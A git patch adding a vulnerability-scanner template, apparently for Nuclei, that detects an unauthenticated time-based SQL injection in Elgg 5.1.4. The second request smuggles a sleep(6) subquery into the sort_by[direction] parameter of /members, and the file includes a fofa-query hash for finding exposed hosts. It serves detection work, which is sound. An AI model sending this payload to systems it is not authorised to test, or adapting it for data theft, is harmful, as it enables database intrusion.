From 894d4bda0d8dcefa03bfd8dd4dcd0edabf9a3ea4 Mon Sep 17 00:00:00 2001
From: Kazgangap <halilkirazkaya@yandex.com>
Date: Wed, 21 Aug 2024 20:39:15 +0300
Subject: [PATCH] elgg sqli

---
 http/vulnerabilities/other/elgg-sqli.yaml | 47 +++++++++++++++++++++++
 1 file changed, 47 insertions(+)
 create mode 100644 http/vulnerabilities/other/elgg-sqli.yaml

diff --git a/http/vulnerabilities/other/elgg-sqli.yaml b/http/vulnerabilities/other/elgg-sqli.yaml
new file mode 100644
index 00000000000..17c4b672775
--- /dev/null
+++ b/http/vulnerabilities/other/elgg-sqli.yaml
@@ -0,0 +1,47 @@
+id: elgg-sqli
+
+info:
+  name: Elgg 5.1.4 - SQL Injection
+  author: s4e-io
+  severity: high
+  description: |
+    Elgg 5.1.4 version has a SQL Injection vulnerability in the sort_by[direction] parameter. This vulnerability allows an unauthenticated attacker to manipulate SQL queries by injecting malicious SQL code, potentially leading to unauthorized data access or database compromise. No user authentication is required to exploit this vulnerability.
+  reference:
+    - https://github.com/4rdr/proofs/blob/main/info/Elgg_unauth_SQLi_5.1.4.md
+    - https://github.com/Elgg/Elgg
+  metadata:
+    max-request: 1
+    vendor: elgg
+    product: elgg
+    fofa-query: icon_hash="413602919"
+  tags: elgg,sqli
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body,"elgg.js")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        @timeout 20s
+        GET /members?sort_by%5Bproperty%5D=name&sort_by%5Bproperty_type%5D=metadata&sort_by%5Bdirection%5D=desc%2c(select*from(select(sleep(6)))a) HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration >= 6'
+          - 'contains(body,"All members")'
+          - 'status_code == 200'
+        condition: and